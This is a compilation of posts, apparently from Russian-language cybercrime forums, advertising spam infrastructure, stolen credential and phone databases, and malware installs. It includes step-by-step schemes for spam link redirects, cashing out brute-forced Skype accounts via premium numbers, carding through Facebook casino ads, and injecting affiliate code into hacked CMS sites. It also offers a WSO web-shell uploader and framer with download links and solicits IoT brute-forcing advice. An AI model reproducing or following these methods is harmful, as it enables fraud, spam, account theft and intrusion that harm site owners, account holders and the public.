У нас есть несколько вебмастеров, от которых мы получаем хх, ххх / в день прибыли от трафика из разных источников (FB, Google, Native, Emails).
- Никаких ограничений!
- Если вы уже продвигаете какое-либо другое предложение по Крипте, не стесняйтесь – свяжитесь с нами, и мы можем обещать вам, что мы превзойдем EPC текущего предложения по Крипте, с которым вы работаете.
- Никогда раньше не запускал Крипто оффера? Но знаете, как делать объемы? Мы поможем вам - наши менеджеры предоставят вам все, что вам нужно для кампании, от рекламы / прелендов / лэндинга/ или чего угодно, чтобы вы начали тест и максимизировали свою прибыль.
I provide good quality spam friendly email servers. Complete setup. from 1 to 30 IPs with powerMTA and everything setup.
mail-tester.com 10/10 score
Price starting from 40 USD
telegram: https://t.me/bmsoftwares
Продаю SMTP сервера под рассылку. Максимальная скорость отправки 15 000 писем
в час. Больше никаких ограничений нет.
У серверов всевозможные подписи PTR, DKIM, SPF, DMARC.
IP адреса чистые, не в блэклистах. Даю рекомендации по использованию.
Цена сервера 1500 рублей в месяц, продлить можно за 750 рублей.
Также делаю e-mail рассылки, цена 1000 рублей за 10 000 писем. С высоким
процентом попадания во входящие.
Под каждые 10 000 писем используется новый сервер, чтобы получить максимальный
процент писем во входящие, независимо от источника базы.
Для связи телеграм @smtpadmin
I am looking to spam about 20k office365 leads with a high inbox rate (no going to spam folder) or alternatively i can BUY office365 logs.
NO SCAMMERS!
ESCROW IS A MOST!
Всем привет ребят, сложно ли сейчас вбить google ads? Хочу трафик на youtube
гнать.
Пробывал пару раз, 1 раз(аккаунт с отлегой 6 месяцев) траф пошол лил 3 дня
потом акк в бан пошол, 2 и 3 раз акк сразу в бан полетел, и вот сегодня
попробовал, уже пол дня жду пока траф пойдет.
Как правильно настраивать рекламу чтобы она не летела сразу в бан?
заранее спасибо
можем посылать смс cообщение по имейлу по вашим базам через PowerMTA... цена по договору
У хостера прописываете новый домен, включаете автоподдомены. Вешаете домен на
клауд, прописываете в А записи как @ домен, так и * поддомены.
Идете на вкалдку Page Rules, прописываете формат: .domain.com/
Then the settings are: Forwarding URL
Указываете целевыую ссылку: http://target.com
Теперь можете смело отправлять ссылки c любым содержанием:
Code:Copy to clipboard
http://one.domain.com/qwqwwq
http://2.domain.com/eopopop
и все они будут редиректить на ваш таргет.
Это не лучший вариант редиректа для спама по мыльникам точно, потому что нет никакого отсеивания только рандомизация ссылки. Если уж делать редирект то лучше на нем и отсеивать ботов, но для старта или как часть системы это очень нужная вещь.
Счастливого времени суток.
Мне требуется купить размещение фейковых объявлений, в которых будет содержаться = номер телефона и(или) эл. почта.
GEO = РФ, Украина, Беларусь.
Тематика и содержание объявления может быть любым ( продажа недвижимости, эскорт услуги, поставка товара и т.д. в зависимости от проходной тематики форума | групп. ) Главное, оно должно быть размещено и содержать номер телефона и(или) эл. почты
Цель, ажиотаж, звонки и письма от реальных людей по данным контактам.
От исполнителя: объявления и база для рассылки.
Оплата по ссылкам на тему.
Жду предложений, количество, время, стоимость.
Гарант.
И так, помогу если у вас есть организованый доступ в сеть( даже если не смогли
закрепится и бот может умереть после ребута )
помогу монетизировать если есть доступ, но нет понимания как кроме (ransom)
можно это сделать
Куплю доступы если нет желания заниматься и ждать или вы специализируетсь на
загрузах и вам что то интерсное попалось, и ожидание выплаты не для вас
Куплю или помогу, если вы сотрудник какой-то финтех комапfнии разработчика или
продающей свои услуги как saas и знаете как монетизировать, но не знаете как
замести следы своего участия
Fintech -
В наибольшей степени развитие финансовых технологий модернизирует традиционные
финансовые услуги и продукты в нескольких областях
Куплю инсталы со спама по USA на тихий ехе и FUD
Кидал прошу не беспокоить. ТОлько гарант данного форума. whyfeffsd9we8@exploit.im
Куплю базы mail:pass Канада\Юса
Контакт в пм!
Куплю ваши базы номеров, не старее 2019 года!
Канада/США!
На Cerberus не лью.
Контакт в пм у кого есть другое решение.
Если закинуть криптованный apk на свежий лендинг и загнать туда траф, при
скачаваниях как сильно будет ругаться браузер?
Если у apk 0 детектов.
есть gx69 sender
не могу понять как его настроить и как работает
помогите пожалуйста
Looking google addwords / Bing specialists to drive traffic campaigns are already running need more experienced guys profits are very good pm your jabber or telegram
nujni zagruski, gotov xorosho platiti
приветствую, в общем сабж.
заморочился с iot ботнетами, взял несколько впсок под скан дешевых - полокали
в считанные минуты за netscan.
знающие комрады, подскажите где приобретаете сервера/впс/вдс под скан либо
может есть какие то другие пути? где либо мал шанс абуз либо где вообще не
абузят на netscan.
сканю 22/23 порты для дальнейшего брута iot устройств.
СРОЧНО продам США сайт тематика кино трафика 4 ляма сутки.
Цены предложения в ЛС.
Гарант согласен!"
Шелл уже залит фулл права.
доброго времени суток. такой вопрос у меня сформировался - каким образом лучше
всего организовать просыл мейллиста с веб шеллов?
Рассматриваю пока два варианта:
1. локальное разделение списка и дальнейшая отправка POST-запроса к форме
мейлера на каждую строку
2. загрузка куска листа на хост,локальное чтение и обработка выбранного куска
с последующим удалением
если идти по первому пути, то не попадет ли в бан сервер,который отсылает
какие-то POST-запросы в форму очень чясто* по-моему на крупных хостингах
отрабатывает подобные запросы защита, принимая их за брут/парсинг.
если имеется информация по спаму с шеллов/готовые скрипты, то с удовольствием
посмотрю код и буду очень благодарен за
помощь.
Какие сейчас есть видео балансеры со всякими спираченными фильмами и
сериалами?
хочу написать для себя маленькое десктопное приложение чтобы было удобно
смотреть.
Какие балансеры есть с более менее удобным API и большой базой
фильмов/сериалов? Возможно платные есть какие?
Старый moonwalk.cc прикрыли, как и множество других
Написал в этом разделе, потому что не знаю в каком это лучше запостить
Есть небольшая идея, брать музыку без копирайта, ставить на нее копирайт
content-id и забирать монетизацию со всех (не)популярных видео, а также с тех
видео, на которых в принципе нет монетизации, но в силу нарушения "наших"
прав, мы ее можем там подрубить.
Как вариант при этом, если возможно, обрабатывать все нарушения "наших" прав
вручную, говорить всем, мол музыка бесплатная, а потом взападло кидать
копирайт клэйм, но это только в случае если мы будем не использовать чужую, а
сделаю свою немного измененную музыку.
Так вот, возможно ли это, в том плане чтобы ютуб на нас не быковал хотя бы до
первой выплаты? Как вариант выложить музыку под картинку, а в треке будет
склеено несколько песен например и добавлено немного шума(если мы чужую музыку
берем за основу), чтобы за один ролик получить большего обхвата чужих роликов
с этой музыкой.
Может быть кто-то сталкивался с этим или знает что-нибудь по этому поводу?
Есть своя методика спама по юсе, хочу затестить, от вас нужно готовое соц инжерное письмо с ссылкой (которая не будет блочиться при переход) на лендинг с вашим зверем. Денег не прошу. Просто тест. Если будут инсталлы то все ваши.
Нужен трафик на сайт знакомств. Целевая аудитория - мужчины от 45 лет из США, Австралии, Англии, Канады.
при покупке базы корпов валидировать как-то надо, а bulkdns resolver не всегда
работает корректно или пока не готовы учиться.
да и просто решение для бедных.
первым делом используем FreeEmailUtilita v.3, с помощью нее сортируем базу по
типу: "каждый домен в свой файл", получается очень много тхт файлов.
чтобы собрать по одной почте на каждом домене используем Powershell скрипт
Code:Copy to clipboard
trap {
write-host "Error connecting to $computer" -fore red
"$computer" | out-file c:\demo\error.txt -append
continue
}
$folder = 'c:\example'
$files = gci $example\*.txt -Exclude domains.txt
gc $files -total 1 > $folder\domains.txt
где соответсвенно
c:\example -путь к папке с файлами
из каждого файла возьмется первая строчка с почтой и запишется в domains.txt в той же папке.
на выходе список почт по одной на каждом домене. простой рассылкой или резолвером уже можно отсортировать мертвые домены, что сущесвтенно сократит базу.
Есть расширения, которые набирают непонятным образом по несколько сотен тысяч установок в день, а потом количество инсталлов откатывается к реальному значению и снова накручивается, это не настоящие установки 100%, в пример привожу 3
1. Video Downloader for Chrome (<https://chrome.google.com/webstore/detail/video-downloader-for- chro/dcfofgiombegngbaofkeebiipcdgpnga>)
2. Color Changer for Facebook (<https://chrome.google.com/webstore/detail/color-changer-for- faceboo/lceicedmdibidgpncleapoiednopgldo>)
3. Automatic 4K/HD for Youtube
(<https://chrome.google.com/webstore/detail/automatic-4khd-for-
youtub/cibiggmomlagpmfeoohfeogifanfjkma>)
И таких накрученных расширений в сторе не мало.
Также заметил, что все они имеют большие и непонятные версии.
Нужно объяснить и дать метод по накрутке фейковых инсталлов на расширениях в
хром вебстор.
Кто что-нибудь думает об этом, может существует какой-либо баг в хроме и его
используют?
Либо кто-то уже знает решения моего вопроса и как это реализовать, за решение
заплачу
кому не жалко поделится))))):smile4::smile4::smile4:
Сабж в заголовке. Есть свежая выкачка АУ баз . более 10кк +
Выкачивал на прошлой неделе для себя. Все смтп лягли . И пока нет времени с
ними ковырятся.
Преимущественно биги но не семые популярные. Среды если быть точнее.
По корпам их примерно более 15 проц.
Валид не чекал.
Дубли возможны Но там без учёта дублей более 12кк база. дублей немного. По
желанию могу прочекать (С доплатой)
Хочу за всю 5к
либо по 800 за 1кк
-------------------------------
Гарант согласен.
На перед и тест - нет согласен.
Первый контакт лс.
Так же могу помочь с настройкой смтп 10/10. на пмта.
Я ищу информацию о перенаправлении скрытия реферера
посоветуйте, где посмотреть или поделитесь образцами писем по тематике binary/crypto. смартлинк, вариантов даже по одной стране полно, письмо не получается сделать универсальным. сейчас пробовал около новостную рассылку, но кажется что может быть что-то получше и мотивационнее.
Плачу от 5$ за бота и выше, первый контакт в пм.
Приветствую рад предложить услугу Трафика Андройд под ваши Приложения
Страны весь мир.
Настройка по таргетингу имеется!
Kачество трафика (Только реальные юзеры) Биржа.
Поток зависит от выбранных стран.
Цена 6$ за 1к за микс мира.
Цена за 1к микс Европы 8$
Выборка от 10$.
Беру заказы от 20к трафа.
При большим объемах имеются скидки!
Принимаю оплату биток или эфир.
Контакт для связи holder@thesecure.biz
Хала всем, подскажите нормальный спам п.о для телеграма( если не трудно, то с линками)
Если кто-то пользуется PMTA и соответственно ее функциналом, поделитесь по каким критериям сортируете домены в .rollup? Все ли относящиеся к yahoo/otlook в один список, или между собой тоже разделяете?
Всем доброго времени .
Есть человек который занимаете перепродажей телефонов! В день от него уходит
более 20 моделей телефонов)что если вшивать туда приложения для Андрид бота ?
Подскажите или направьте в нужную сторону )как и что вообще посоветуете ?
Разово надо мыло от гугла, когда ломишся на gmail с другого девайса пишут мол "бла бла была попытка добавится ваш акаунт там то там то". 1кк миллион раз такое видел как надо не могу найти и сгенерить тоже. У кого есть? За пересыл заплачу 20-30$ на пиво. Срочно в ПМ!!!!
Spoiler: 15
P.S для тех кто в теме можете сразу перелистнуть вниз, там ссылки на партнерки предоставляющие платные номера.
В этой статье я хотел бы поделится информацией о том как можно обналичить звонки из аналоговой/ip/sip и пр видом телефонной связи которая взаимодествует с каким либо оператором предоставляющим услуги международных вызовов.
И так вы захотели обналичить баланс с брут акк скайпа(отмечу сразу что он уже задрочен и налится не охотно,а так же 99% платных номеров уже в ЧС скайпа, ищите др варианты заработка)
Пример работы(основные аспекты):
1. Зашли в партнерку(указал их в самом низу страницы) ищем тестовые номера
там все интуитивно понятно что к чему я подробно расписывать не считаю целесообразным.
2. Прозваниваем на тестовые номера, ищем номер на который мы дозвонимся(дело в том что разные операторы по всему миру поддерживают разные направления) - если вызов прошел успешно вы услышите характерный автоответчик и еще он отобразится в соответсвующей колонке на сайте партнерки
3. У нас есть номер на который идет дозвон, резервируем их(пишем саппорту если номера уже заняты), номеров нужно как можно больше тк на примере скайпа нужно сразу большое кол-во акк. я думаю обьяснять зачем нет необходимости.
4. Звоним на свои зарезервированные номера, все вызовы будут отображатся в настоящем времени а также будет статистика и учет всех ваших вызовов.
5. После проделанных операций вам будет начислинна сумма согласно вашиму тарифу(обращаю внимание что если там будет 7/1 То значит что все что вы назвоните в этой неделе, упадет вам на счет в следущей), вывести сумму не составит труда уточните все у поддержки.
Данная информация очень полезная, она открывает целую сферу деятельности. Вариантов хватает что обналичивать, от обналички банальных симкарт или карж баланса до обнала транков sip операторов.
Партнерки с платниками(только проверенные):
1.telepremium.net
- вывод от 100$ минус партнерки это онлайн саппорта
2.telecomincome.com(здесь регистрируетесь) premiumstats.biz
- вывод от 200$ по моему мнению является самой комфортной, саппорт 24/7.
рекомендую начинать здесь.
3.world-premium-telecom.com
- самая крупная партнерка с обширным выбором номеров.(не удобно выводить, большая комиссия, не рекомендую новичкам)
есть и др которые не проверял.
© copyright
Большинство получателей увидят письмо с отключенными картинками. Это не значит, что картинки не нужны, ведь получатель может «включить» картинки, если письмо его заинтересует. Но ваше письмо должно «читаться» без картинок.
Картинки… картинок не будет
Большинство получателей увидят письмо с отключенными картинками. Это не
значит, что картинки не нужны, ведь получатель может «включить» картинки, если
письмо его заинтересует. Но ваше письмо должно «читаться» без картинок.
Нельзя использовать картинки для важного содержания — заголовков, текста.
И пропишите alt у картинок - некоторые почтовые клиенты покажут его на месте
картинок.
**Размер имеет значение
**
Письмо должно хорошо смотреться в preview-панели Outlook, шириной около 200
пикселей. Если вы сделаете дизайн фиксированной ширины 550 — 600 пикселей, то
избежите проблем с отображением в большинстве почтовых клиентов.
Что касается «высоты» письма, то не стоит делать письма слишком длинными — лучше поставить ссылку на полный текст на сайте. Люди не привыкли много времени проводить «в почте» и скорее всего не дочитают ваше письмо дальше третьего «экрана».
Flash и JavaScript: сразу «нет»
Единственное, что останется от ваших flash-роликов и javascript-кодов в почтовой программе клиента — это предупреждение системы безопасности. Поэтому вместо flash-ролика вставьте в письмо один кадр из него (в виде обычной картинки). Флэш и яваскрипт положите на страницы, куда пользователь попадет по ссылкам из письма.
Идеи для вдохновения
Единственная галерея email-дизайна: www.campaignmonitor.com/gallery (на
английском)
Несколько хороших писем среди победителей MarketingSherpa Email Award
Еще несколько советов. Не про верстку и графику, но тоже про дизайн:
HTML, нельзя CSS
Хотя некоторые почтовые клиенты поддерживают CSS, лучше не используйте стили
при создании дизайна письма. Звучит не очень заманчиво, но реальность сурова —
большинство получателей вашего письма не увидят оформление, заданное в
таблицах стилей.
![](/proxy.php?image=http%3A%2F%2Fblog.secnull.org%2Fwp-
content%2Fuploads%2F2008%2F08%2Fcss.gif&hash=0501ddb2bbbafe4bc53fb4a54c3f5ff7)
А если старый добрый html не позволяет реализовать ваш творческий замысел без
css, то расположите копию письма на сервере и поставьте в письме (в первых
строках) ссылку на эту веб-версию письма.
![](/proxy.php?image=http%3A%2F%2Fblog.secnull.org%2Fwp-
content%2Fuploads%2F2008%2F08%2Fhr.gif&hash=6911525665b34af47edff8e1d5fb3db9)
Вложенные файлы: скорее «нет», чем «да»
Хотя запрета на вложенния никто не вводил, это считается «дурным тоном». Уже на курсах «пользователей ПК» людей учат никогда не открывать вложения в почте, если не уверен на 100% в надежности отправителя. Некоторые рассылки заранее предупреждают, что они никогда не отправляют вложения — и это «хороший тон».
Unsubscribe: обязательно
В каждом письме должна быть информация о том, как перестать получать рассылку.
Отписка не должна быть сложной процедурой. Идеальный вариант — ссылка,
позволяющая отписаться «в одно нажатие»: нажал ссылку и перестал получать
письмо. Не заставляйте получателя входить в свой «аккаунт» или «личный
кабинет», чтобы «изменить параметры подписки».
Кстати, слово «отписаться» звучит не очень… «Прекратить подписку», «удалить
адрес из рассылки» - длинее, но благозвучнее.
Проситесь в адресную книгу
Если подписчик внесет ваш адрес в адресную книгу, то ваше письмо будет пользоваться некоторыми привилегиями. В зависимости от почтовой программы, оно либо не попадет в спам, либо будет показано с картинками, либо и то, и другое одновременно.
Поэтому просите получателей внести ваш адрес в адресную книгу.
Первые строки
Outlook и Gmail показывают в списке входящей почты первые строки письма. Учитывайте этот фактор и кладите в начало письма значимый текст.
![](/proxy.php?image=http%3A%2F%2Fblog.secnull.org%2Fwp- content%2Fuploads%2F2008%2F08%2Fpreview.gif&hash=4eb1cc1da0d0a3eb2fe3d8c7db56e1b3)
**Subject и From
**
Если тема письма не заинтересует получателя, он, скорее всего, не прочтет
письмо. Поэтому подумайте над темой. Главное правило — заголовок должен
описывать содержание письма.
В поле From, как правило, ставят название компании. Однако, некоторые добиваются неплохих результатов, указывая имя менеджера компании.
Не все слова разрешены
Использование некоторых слов может резко ухудшить ваши отношения со спам- фильтрами. Напишите в тексте несколько раз слова «бесплатно», «горящие туры» или «гарантия», и ваше письмо окажется в папке «Нежелательная почта». То же самое касается восклицательных знаков и слов, набранных ПРОПИСНЫМИ БУКВАМИ!!! Это запрещено в почте.
Рады презентовать партнерскую программу VOLSOR с продуктами Payday Loans на
Европу.
В данный момент это Чехия, Польша и Испания, скоро – Россия и другие страны
Регистрация:
**
https://www.volsor.com/ru/signup/
Для получения бонуса 50$ в поле "Промо код" введите - PRIVATE50**
Минимальная выплата 80 евро или 100 долларов (опять же мы без проблем платим и
меньше и наперед).
Бонус код добавит на чешский баланс 1000 крон (примерно 50 долларов).
Volsor настолько уверен в том что вы продолжите работать дальше, что готов
выплатить каждому приветственный бонус в убыток себе на начальном этапе
сотрудничества.
В чем преимущество работы на Европу, по сравнению с США?
В США за последние 5 лет, вебмастеру становится с каждым днем все тяжелее
добывать трафик, но в Европе дела обстоят совсем иначе.
Из основных плюсов работы на Европе, я хочу отметить следующие:
1. Алгоритм поисковых систем в Европе в корне отличается от США в лучшую сторону для вебмастера. В данный момент, алгоритм гугл в Чехии и Польши напоминает американский гугл 2007 года. Также существуют локальные поисковые системы, на которые приходится 30% поискового трафика.
2. 90% клиентов, в странах где мы присутствуем, используют локальные сервисы электронной почты.
3. Практические одинаковые цены за лид, по сравнению с США.
4. Относительное спокойное реагирование рынка, на способы продвижения к которым привыкли мы.
5. Начало формирования ниши Payday loans в Европе. В прошлом году Банк HomeCredit запустил дочернию компанию микрокредитования, мировая компания WONGA зашла на Польский и Испанский рынок, а компания Kreditech работаящая на Чехию и Польшу привлекает инвестиции от Varde Partners и Blumberg Capital. В год открывается больше сотни крупных компаний, тем самым, спрос на лид с каждым месяцем только возрастает, а следовательно вебмастера получают стабильный рост цены за лид.
6. Приход на рынок компаний, с целью максимального роста кредитного портфеля. Тоже самое мы наблюдали в 2008 году в США, когда крупные компании, покупали практически все лиды.
Немного о VOLSOR:
Средний EPL – 3,5 доллара. При высоких уникальности лидов, EPL доходит до 6-7
долларов.
Промо инструменты – Лендинги на наших доменах, лендинги с возможностью
установки на ваших доменах/хостингах, емейл темплейты, баннеры.
Основные источники трафика и наш опыт с ними + скрины:
1. MAIL
Основной объем несет именно емейл трафик, люди отлично конвертируются.
90% процентов людей используют локальные почтовые сервисы.
http://adw-kupon.ru/go/MAIL.jpg
2.AdWords
Никаких ограничений как в ЮСЕ на покупку пейдейного трафика.
3.Дорвеи/SEO:
Ребята которые не смогли работать по пейдею на ЮСЕ, без проблем работают с
европейским гуглом.
http://adw-kupon.ru/go/SEO.jpg
http://adw-kupon.ru/go/doorways.jpg
4. SMS реклама
http://adw-kupon.ru/go/SMS.jpg
Промо инструменты: Лендинги, CMSка с 13 дизайнами с возможностью размещать на
своем домене и хостинге. Ифрейм форма.
Емейл темплейты. Баннеры.
Всю остальную информацию, вы можете посмотреть на официальном сайте где все
подробно расписано
https://www.volsor.com/ru/signup/
Для получения бонуса 50$ в поле "Промо код" введите - PRIVATE50
Чекер, автозаливщик и фреймер шеллов WSO Control.
ВОЗМОЖНОСТИ "WSO CONTROL":
- Проверять шеллы WSO на работоспособность;
- Заливать любые файлы на WSO шеллы;
- Вставлять фрейм в файлы на шеллах.
ЧЕКЕР ШЕЛЛОВ:
- Высокая скорость проверки шеллов на большом количестве потолок. Программа
записывает гудовые и нерабочие WSO шеллы в разные txt файлы.
ЗАЛИВКА ФАЙЛОВ НА СЕРВЕР:
- Автозаливщик производит заливку любых файлов как в папку с шеллом WSO, так
и корень.
- Программа записывает ссылки на успешно-залитые файлы в отдельный файл.
- Заливка файлов на шеллы происходит в многопоточном режиме.
ФРЕЙМЕР:
- Программа вставляет код фрейма в любые файлы на WSO шеллах: как в
индексные, так и во все файлы.
- Вставка фрейма происходит в многопоточном режиме.
Любой формат WSO шеллов: программа обрабатывает шеллы как с паролем, так и без
пароля.
Работа через прокси - программа может выходить в сеть через любой тип прокси.
ССЫЛКИ ДЛЯ СКАЧИВАНИЯ ПРОГРАММЫ:
http://qfs.mobi/f1284660
http://www.datafilehost.com/d/61658be0
http://bitshare.com/?f=z3ua8vlc
http://ge.tt/3sCt0DW1/v/0
https://filetea.me/t1scdeKEnPHT3iidn58HwsfSA
Выкладываю полностью бесплатно, т. к. писал программу на заказ - но заказчик
кинул меня!
Программа ничего никуда не передает и ни с чем другим не склеена - Вы можете
проверить это!
Приятной работы!
ПРОГРАММЫ ДЛЯ МАССОВОЙ РАССЫЛКИ СООБЩЕНИЙ В ICQ
№1
ICQ HooK v9.14
№2
ICQ HooK Light v3.0
**СКАЧАТЬ
ссылка 1
ссылка 2
ссылка 3
ссылка 4
**
tags: icq спамер продажа, icq спамер ключ, спамер для аськи, программа для спама в icq, icq spammer, обмен icq спамер, хакер icq, программа для рассылки спама icq, спамер icq 2014, спамер icq 2015, спамер icq 2016, спамер icq по городам, sms spammer смс, спамер icq спамер, spamer icq spamer, реклама icq реклама, рассылка icq рассылка, спам icq спам, активатор icq активатор, activator icq activator, валидатор icq валидатор, validate icq validate, спамер смс спамер, spamer смс spamer, реклама смс реклама, рассылка смс рассылка, спам смс спам, спамы, ася, аська, icq, любовь, спам, любовные, статусы, смайлики, клевые, с цифрами спам на заказ, спамы для аськи, спамеры скачать бесплатно, картинки для контакта на стену, спамы для аськи, чаты, реклама чатов, ответы на викторины для чата, аська, спамы для icq, icq спамы, спамы про любовь, спамы с цифрами, спамы напиши цифру, спамы про любовь с цифрами, боты, пошлые спамы, icq, jimm, locid, dichat, smaper, qip, bayan, tegos icq, спам-рассылка, спам-книги, спамилка, спамилка pthc, спам, спам.ру, спамер icq скачать, куплю спамер icq, спам форум, спам сайты, спам сайт, спам рассылки, спам рассылка программа бесплатно, спам рассылка по icq, спам рассылка писем, спам рассылка бесплатно, спам книги, спам книга, спам как сделать, спам доски, icq спамер скачать, куплю спамер icq, программа icq спамер, спам бесплатно, заказ на рассылку icq реклам, icq хук, номера icq
Возможности бота:
По описанию предоставленному автором, не требует сторонних ДЛЛ, реализация на WinAPI, несколько методов антидебака и антиотладки, шифрование трафика между ботом и панелью и другие мелкие фичи, по большому счёту стандартный набор.
RARPasswd: DlaB.orG.In
Скан бота на детект АВ.
Домашная страница авторов вроде как, по крайней мере заявлен этот линк.
Уважаемые форумчане! У меня вопрос такого плана: существуют ли какие нидь тулсы для создания Skype спама? Мож кто знает линку, где об этом говориться? Спасибо!
Контакты: ЛС, jpo38@yahoo.com
Не актуально!!!
Ищу mail sender и sms sender для Scam Team. Germany. Требуется подключение в Telegram Бота. Желательно, подключение по API. Подскажите, имеются ли достойные, готовые решения на рынке на сегодняшний день с возможностью подключения по API? Или для такого требуется делать кастомное решение с нуля?
Приветствую тебя! Сегодня мы поговорим про такую нишу как CPI
(оплата за установку мобильного приложения).
Итак, какие у нас есть тематики в CPI нише?
Click to expand...
– Игры.
– Магазины.
– Такси приложения.
– Мобильные банки.
– Официальные букмекерки
Лично я бы акцентировал внимание на:
Click to expand...
– Игры.
– Маги/ Banks (добавлю это в одну группу по сложности).
– Еще довольно таки интересные приложения это буки, но здесь не маленькая цена
входа, так как в основном это UK/US/CA гео и там себестоимость каждой
установки будет обходиться вам порядка 3-6$ когда в играх это может быть
0.3-0.5 цента при хорошей конверсии
Где мы можем найти оферы?
Click to expand...
– СПА сетки.
– chats.
– Прямые рекламодатели.
Советую использовать https://cpad.pro/search/ или аналоги далее выбрать в
критериях
поиска:
А теперь про сетку реклам
Click to expand...
Spoiler: Могу отметить неплохие сетки
PS это не биржи
Это реклама в играх/биржах
Я думаю этот формат вы тоже все видели, когда играете в мобильном либо сидите
в какой-то программе и вылетает видеореклама какой-то игры, собственно это оно
и есть) самые лучшие форматы это видео 9:16 и 16:9 то есть во весь экран.
У меня в команде есть люди которые брутят аккаунты Google Play (разработчиков)
и через них подгружают софт (обходом перепроверки)
Если будут вопросы - задавайте в этой теме !!!
Спасибо!
Приветствую всех, подскажите пожалуйста каким софтом легче всего очищать(от дублей и разного мусора),редактировать,сортировать слитые базы(дампы) с сайтов? кто какой софт использует для этого?может есть какой то готовый универсальный софт для таких дел?
Нужны загрузки адалт USA ,или траф... или тот кто умеет сливать с бирж
D0nBot- spam bot for sale
Price =450$
Freebsd version + windows client with all sources
WMZ accepted
А в чем подвох? Или это обычное дело на этом форуме выкладывать конифгураторы под приватный софт?
Всем привет. Такой вопрос:
Я вобщем думая куда можно применить свои навыки селениума для небольшого фарма
монет, пришел к мысли, что можно писать спамеров для соц сетей\емейлов (когда
не через смтп, а через лк эмулирую отправку).
Конкретно вопрос в том, что можно ли так добиться чего то стоящего при
рассылке стиллера\ратника таким способом?
Если вопрос тупой - прошу прощения.
Уважаемые, может быть у кого-нибудь остались обучения, от этого замечательного
человека ( Aels, InboxLords ) или возможно знаете где найти?
Буду очень благодарен!
Мне нужен спам под мою базу. Чтобы не ломать SMTP и не использовать spoofing пришел к решению, что можно сделать свой mail server при помощи DMS. DKIM, DMARC, SPF будут соответсвенно валидные, при помощи SPF могу разрешить использование моих доменов для уже купленных SMTP. html-письма летят в инбокс Gmail. планируется прогрев в 2 недели под каждый домен.
каковы шансы отспамить в inbox 100k строк с 10 собственных серверов?
Всем здравствуйте. Я новый человек на этом форуме, да и в принципе заработков
в сети не имел никогда, но ситуации складываются по разному и жизнь привела
меня сюда)
Наткнулся на пост человека, он в общих красках рассказал идею по встраиванию
партнёрок в чужие сайты, но так как знаний у меня пока немного, я не понимаю
некоторых слов и действий. А написавший этот пост пользователь комментариев не
даёт, да и не должен как бы, тут всё понятно)
Я процитирую пользователя: "Покупаешь за 50 баксов сервер, можно и дешевле,
выкачиваешь себе паблик базы url:log:pass, учишься работать минимально с
EMEDITOR или ищешь опять же парсер линков со строк, на форуме ищешь бесплатные
чекеры этих строк на Opencart/Magento/Joomla/WordPress/прочие CMS (я знаю что
это шопы но шопы часто с норм трафиком и почти во всех код пихается и паблик
только под такое и подходит), гуды проверяешь на посещаемость, посещаемые
ресурсы пихаешь в партнерку Hotejka (тут на форуме) / т.е устанавливаешь JS
код в исходный код шаблона страницы и льешь трафик = получаешь бабки с
воздуха. Если постоянно мониторить ресурсы и уделять этому хотя бы 2 часа в
день, прям с нихуя получается такая статистика выплат..."
Из этой цитаты мне непонятны несколько вещей:
-что необходимо найти в найденных паблик базах?
-как вставить код в шаблон страницы? т.е. я правильно понимаю, необходимо грубо говоря вскрыть каждый из выбранных сайтов и вставить туда код партнёрки?
не пинайте сильно, все когда то начинали, кто то раньше кто то позже)
буду очень благодарен за помощь
Всем привет! Кто знает методы для регистрации Gmail аккаунтов без смс. Я
слышал про подбор Android ID и тп. Но может кто-то знает то, что более менее
актульное или было актуально не так давно.
Идеально чистый socks берем по дефолту
Hello dear XSS board,
I have been reading this board for a few months now, learned a lot and made my first few bucks, since I only want to post when I have something to say that is important for a topic, I rarely participate in discussions. Before I ask a question I tend to read many discussions on this board, friendly boards and leaked tutorials to not annoy other users with my lowbob questions.
Unfortunately, I have now got to the point on a topic where I just don't find anything in the board, but maybe I don't find it because I have no Cyrillic letters on my keyboard.
I want to start my first mailings and have everything ready:
Now to my questions:
1. I have read that I should obfuscate the links, does it suit to use an open
redirect generator from GitHub or do I have to buy one from this board?
2. The 20 SMTPs I have, have pretty random domains, won't this make my
mailing obviously recognizable as spam, or do you know how this affects click
rates on my campaign?
3. A matching domain to the topic of my campaign is arguably better than some
random cracked SMTP, therefore I want to give a self registered domain for
mailing a try. Be ready for the dumbest question you have ever read:
How do you warm up your self-hosted SMTP? I know you have to send a lot of
mails to a mailing list you obtained, I also know also that you should
increase your sending limit every day by 1000. You will probably not spam your
letter during the warm-up, so my question is, what letters do you send your
customers during warm up in the afford to avoid that they report you as spam?
4. If we say during warm up we send n=n+1000 mails each day, does that mean
we send this amount to every provider we spam?
web.de, live.com and outlook.com will probably not communicate with each
other, during the warm-up, to check if we are above this amount of mails.
5. How do you evaluate the sending limit of cracked smtp?
I know that this are a lot of questions and probably pretty newbie ones, but I
wasn't able to answer them on my own.
It is quite possible that I did not find the answers to these questions in
this forum even if they exist, since I unfortunately only have access through
the search to English articles.
Would be very happy if someone could help me with my questions.
Best regards
0xC185EC
Если у вас попалась хорошая корпоративные карты, что можно сделать? Сдать в
магазин на реализацию, за 30-50 долларов?
Как насчет получить в 10, 100 или 1000 раз больше?
Это не будет супер быстро или супер просто, но это сработает.
Суть в том, что мы покупаем рекламу на фейсбук и получаем деньги за продажи.
Я приведу все контрольные точки, которые вам нужно выполнить. Если все это
сделаете - я гарантирую, что все сработает.
Вот 8 этапов:
1. Покупаем аккаунты Фейсбук для рекламы, максимально качественные (ищите
слово ПЗРД в описании)
2. Устанавливаем трекер типа Кейтаро
3. Регистрируемся у партнерок онлайн казино (ищутся в яндексе, онлайн казино
с русскими владельцами все платят криптой) Обратите внимание - само казино не
должно работать в России (Фейсбук в РФ рекламу не крутит).
4. Для регистрации в партнерках онлайн казино понадобятся аккаунт в телеграм,
скрины предыдущих продаж и немного знания терминологии. Находите партнерки и
после небольшого собеседования в чате они вам выделяют так называемую "капу"
- лимит трафика, который вы сможете залить. После залива они смотрят
качество, далее или продляют капу, или останавливают сотрудничество.
5. Берем сервис аренды приложений для гэмблинга и собственно берем приложения
в аренду или делаем PWA
6. Берем рекламные видео через спай-сервисы (ад харт, например)
7. Через соксы и антидетект заходим в ФБ, и собственно вбиваем карты.
8. Делаем рекламы. Для казино - устанавливаем публику мужчины 25-55 лет.
Рекламных кампании минимум штук 10, по схеме 1 кампания - 1 Ад сет - 1 Ад.
Реклама ведет на арендованное приложение, в котром размещаем свою адвертскую
ссылку на казино.
